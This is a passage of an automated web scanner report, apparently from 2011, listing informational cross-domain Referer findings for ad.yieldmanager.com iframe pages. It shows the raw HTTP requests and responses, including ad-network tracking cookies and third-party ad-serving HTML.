</script><script type="text/javascript" src="http://tags.mathtag.com/view/js/?strat=109185&cr=126413&supply=99&random=1315313092&rfr=http%3A%2F%2Fsports%2Eyahoo%2Ecom%2Fnfl%2Fblog%2Fshutdown%5Fcorner%2Fpost%2Ftiki%2Dbarber%2Dremains%2Dunemployed%2Dand%2Dsad%3Furn%3Dnfl%2Dwp6443&rfid=238940&ymct=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F3%2CeAGVUMtuo0AQ%2EJk9rQzDPMAQa7QaG79iE7ABxfhiAUPAmDc42Pv164RstNftQ3d1taqkLognWhD4PJQkJZK5HATKBGKEo1CWNMRH0mQyUTSECJaJOjpsXJ2ZZ3fJpu9u7bLP2rzyzYAYiz%2DAN2yW%2DjH1mbmbrz55xjrLtYfjjFnpl34g%2ErPr%2EJmtvzSP2Q9wuysWVrqefpvp7P6SsrvnzKXt646YutcZziIzZhLx0vVt64Tk6PCL4Xi3Y%2D4i81vI6CjpuuoJgDgrAz8T%2EYaLdz8pSzEsc2CvlxTKKcSlXMvAoGN1rGIsQkKIDNH4AZAGVY2ICAGdtlXZdC2wKZIQesSKCHp6Aad71lFWa3O12py8%2Dvd7vNw7SgbfjEq3G%2D9IgEc9tjJNMD9YFGIo44dehWBLxfzZMSVLz6aniu2r1MnEPt2x2kj42L%2EI%2DSKImV4nNphSaYFuVpeqUdYL4HmwgVhSIZQ0DBHYUL66Huaxs92RcGkWdhKvidb2gFEFKRARGeypBH7%2D%2DJvH8Mw%2EWRRvGQiyMgZtcu142RensGyKqAFV2XagO1%2EOQuA3QdQITZT756IVrkWUV1l5j7jgF1xoff7r2hT0YST0lUII%2EgN86sV0%2C"></script>
...[SNIP]...

15.32. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /iframe3?VqUDAPKUGABlUZgAAAAAAAnhJQAAAAAAAgAEAAIAAAAAAP8AAAADCN0EHgAAAAAAc7sgAAAAAABfoTEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJYpIaTfuuCpzSNjBmAwIi1JX6s2W-oVD3HxaZAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p035eiu%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320555%2FL%3Dvf1TJGKIKoTpARpjTl.wjRRUMhd7ak5mFssACRdk%2FB%3Du0uOQmKJiUo-%2FJ%3D1315313355644217%2FK%3DwAUe6WLorFCi06uKuG03Mw%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331355624%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dvf1TJGKIKoTpARpjTl.wjRRUMhd7ak5mFssACRdk%26_salt%3D3929728865%26cb%3D1315313355644217%26i%3D140469%26r%3D0,a1842154-d886-11e0-9de6-78e7d15f4cd0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=vf1TJGKIKoTpARpjTl.wjRRUMhd7ak5mFssACRdk&ad_type=iframe&ad_size=300x250&site=140469&section_code=14445103&cb=1315313355644217&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15p035eiu/M=787833.14445103.14291869.1659633/D=maps/S=2022332404:LREC/Y=YAHOO/EXP=1315320555/L=vf1TJGKIKoTpARpjTl.wjRRUMhd7ak5mFssACRdk/B=u0uOQmKJiUo-/J=1315313355644217/K=wAUe6WLorFCi06uKuG03Mw/A=6261227/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; bh="b!!!#N!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!#=3f9$!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!
$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f9)!$?i5!!!!%=3`c_"; liday1=fh'jT*YKlx8SkUrhG%Lm!79C8>U9f4; ih="b!!!!/!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!3Eo4!!!!#=3f.'!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; vuday1=@n$r!BKZI(BgvR/4M6EqoyOxB!!w[/!79C8jsp`9; pv1="b!!!!(!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!!E)(!$[Rn!2reF!'<Lw!#a.3!!QB($To(0!i=9S!!28s!(Y#b~~~~~~=3f<'=3p8,M.jTN!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9)=4'2#!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q"; lifb=0EA2)A9.-B!6-Nb'W00AM5Jkn/>M1M:>Rmw; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:19 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0228.rm.sp2
Set-Cookie: ih="b!!!!0!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!$=3f<j!3Eo4!!!!#=3f.'!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; path=/; expires=Thu, 05-Sep-2013 12:49:19 GMT
Set-Cookie: vuday1=@n$r$BKZI(BgvR/4M6EqoyOxB!!w[/!79C8kS^YR; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: lifb=0EA2)A9.-BBcN3V%T!GP!6-Nb'W00AM5Jkn/>M1MrX6Q3; path=/; expires=Tue, 13-Sep-2011 12:48:14 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:49:19 GMT
Pragma: no-cache
Content-Length: 2881
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(9982309);}
</script><IFRAME SRC="http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.12;sz=300x250;pc=[TPAS_ID];click=http://t.invitemedia.com/track_click?auctionID=13153133591610994-126547&campID=106300&crID=126547&pubICode=2145139&pub=24272&partnerID=77&redirectURL=;ord=1315313359?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N3220.aod-invite.comOX15921/B5642080.12;abr=!ie;sz=300x250;pc=[TPAS_ID];click=http://t.invitemedia.com/track_click?auctionID=13153133591610994-126547&campID=106300&crID=126547&pubICode=2145139&pub=24272&partnerID=77&redirectURL=;ord=1315313359?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://t.invitemedia.com/track_click?auctionID=13153133591610994-126547&campID=106300&crID=126547&pubICode=2145139&pub=24272&partnerID=77&redirectURL=http://ad.doubleclick.net/jump/N3220.aod-invite.comOX15921/B5642080.12;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=1315313359?">
<IMG SRC="http://ad.doubleclick.net/ad/N3220.aod-invite.comOX15921/B5642080.12;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=1315313359?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
</NOSCRIPT>
</IFRAME> <img src='http://t.invitemedia.com/track_imp?partnerID=77&campID=106300&crID=126547&auctionID=13153133591610994-126547&cost=2.7600&pubICode=2145139&pub=24272&url=http%3A%2F%2Fmaps%2Eyahoo%2Ecom%2Fdarla%5Ffc%3Fcb%3Dyahoo%2Eads%2Edarla%2E%5Floaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf%2D8%26rn%3D1315331355624%26em%3D%257b%2522site%2Dattribute%2522%253a%2522content%253dno%5Fexpandable%253bajax%5Fcert%5Fexpandable%2522%252c%2522ad' width='1' height='1' border='0' /><iframe src="http://pixel.invitemedia.com/data_sync?partner_id=77" height="1" frameborder="0" width="1" style="display: none;" scrolling="no" marginheight="0" marginwidth="0"></iframe>
...[SNIP]...

15.33. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string, so any request the browser makes for the cross-domain resources below will, by default, carry that URL (query string included) in the Referer header. The response contains the following link to another domain:

Request

GET /iframe3?XKUDANuUGABxQIsAAAAAAB4aEgAAAAAAAAAAAAIAAAAAAA0AAwADCOQEHgAAAAAA7mUJAAAAAAA.8RgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0AAAAAAAAAUQMh2vp8aLwdAAAAAAAAAFEDIdr6fGi8HQAAAAAAAABRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgCC9HQfquCkAOlZMpL9Io9i3zLSbCa8ZfwmnlAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15rca20kb%2FM%3D787833.14445125.14291892.1806201%2FD%3Dsports%2FS%3D2022092242%3ALREC%2F_ylt%3DAuXImj6wykRaku7iPAhaBYTSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3DzV2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261244%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445125%26Z%3D300x250%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D59509023%26cb%3D1315313081109312%26i%3D140509%26r%3D0,0254ac84-d886-11e0-b5f4-78e7d1fa057c HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS&ad_type=iframe&ad_size=300x250&site=140509&section_code=14445125&cb=1315313081109312&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15rca20kb/M=787833.14445125.14291892.1806201/D=sports/S=2022092242:LREC/_ylt=AuXImj6wykRaku7iPAhaBYTSrYZ4/Y=YAHOO/EXP=1315320281/L=.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS/B=zV2xPtj8elw-/J=1315313081109312/K=dHuXEgTLQ4cGOnShgI49sw/A=6261244/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!%!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!,Y+@!$XwL!1n,b!#t3o~!!ZH)'jyc6!w1K*!!J0T!$!$U!$]7n~~~~~=3]ih~~"; ih="b!!!!)!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!#=3f.'"; vuday1=4M6Eq!79C835n]5; liday1=*YKlx!79C85[p%3; bh="b!!!#E!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3:c!!!!#=3f8T!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$
=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:52 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0406.rm.sp2
Set-Cookie: ih="b!!!!)!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!'=3f8^!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!#=3f.'"; path=/; expires=Thu, 05-Sep-2013 12:44:52 GMT
Set-Cookie: vuday1=BgvR)!79C8gzv0u; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!%!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!!E)(!$XwW!1n,b!#t3o~!#Ds0$To(1!w1K*!%4=*!#!8+!$]7n~~~~~=3f8^~~"; path=/; expires=Thu, 05-Sep-2013 12:44:52 GMT
Set-Cookie: uid=uid=04358f32-d886-11e0-934b-87a5113d12ef&_hmacv=1&_salt=1445808906&_keyid=k1&_hmac=71f80210cf05029c6f70f1dbcbfe9d80aca9ddb3; path=/; expires=Thu, 06-Oct-2011 12:44:52 GMT
Set-Cookie: liday1=8SkUp!79C8Jh]Hw; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:44:52 GMT
Pragma: no-cache
Content-Length: 1432
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(9126001);}
</script><iframe name="turn_ad_call_frame" width="300" height="250" frameborder="0" src="http://ad.turn.com/server/ads.htm?&pub=2701141&code=17152424&cch=6872266&l=300x250&nonjs=1&sli=615918&bli=1634623&exPub=24284&city=Dallas&acp=2.8980&rnd=1315313092&3c=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F3%2CeAGNklmPokAUhf%2EMPE0aakWgTWVSiAu2iCKO4otha1DWZglt%2E%2Eomoz3peZv7UPdUbs53UyeFyDiSFRypkYLIK0ERUcaIYBIFElRR9ATH4zGGBGJKFSo9HV%2E2Ol93%2DznX3rdGw%2E%2DURr1pfJf303hcIOc91yfWdrp4zOV8v3wMRcX%2Dx%2EQd8B9aD5f8a8%2EQ%2D7tlERezzdXQ%2EgJ0fls7duJ%2DxHB12FJLd1vTmWXmBF3WBxeunICenDA1D6fE1PfEfXAGP3tK2rZ6BiDOSt%2ELRK8OxZuXlKUYlDnYGXOGpDrwMEx9YDJZkRVCREQplRCWBoFVpKhYRAocYYiAzpqqrNsG7BiGGEMVY4qfV%2EZ0As63rGW8Oxr5ddTfUttLO%2Emy4Ymnuc6udk8UuMzlC8sC0%2DOGIYIkMiAUBFZMzJeOBTd6pp0rbldXJxP765a%2EmUkoe6mUz%2EyY62%2EJDmjs4zd%2D37RXJcp6ASzvGESgghBUCcLghYWL7jiNndWWBnOr2CWxQdWmB5yN8AgNHwDYDIKfP75yub%2EnWybFawb8rIxBk3RtWPbFOSjrIqpBVTYtaC%2EpRfC92o9qoY5y71I0QldEeZWVtygUvCIUGi%2E81dUFG0BCX40oJZ%2D4rcd5%2C&url=http%3A%2F%2Fsports%2Eyahoo%2Ecom%2Fnfl%2Fblog%2Fshutdown%5Fcorner%2Fpost%2Ftiki%2Dbarber%2Dremains%2Dunemployed%2Dand%2Dsad%3Furn%3Dnfl%2Dwp6443" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"></iframe>
...[SNIP]...

15.34. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string, so any request the browser makes for the cross-domain resources below will, by default, carry that URL (query string included) in the Referer header. The response contains the following link to another domain:

Request

GET /iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=g5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL&ad_type=iframe&ad_size=300x250&site=140469&section_code=14445103&cb=1315313124134052&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15p48ptjt/M=787833.14445103.14291869.1659633/D=maps/S=2022332404:LREC/Y=YAHOO/EXP=1315320324/L=g5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL/B=ihhvQUoGYno-/J=1315313124134052/K=MkO1E30KWMQ9OU8J05I8pg/A=6261227/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
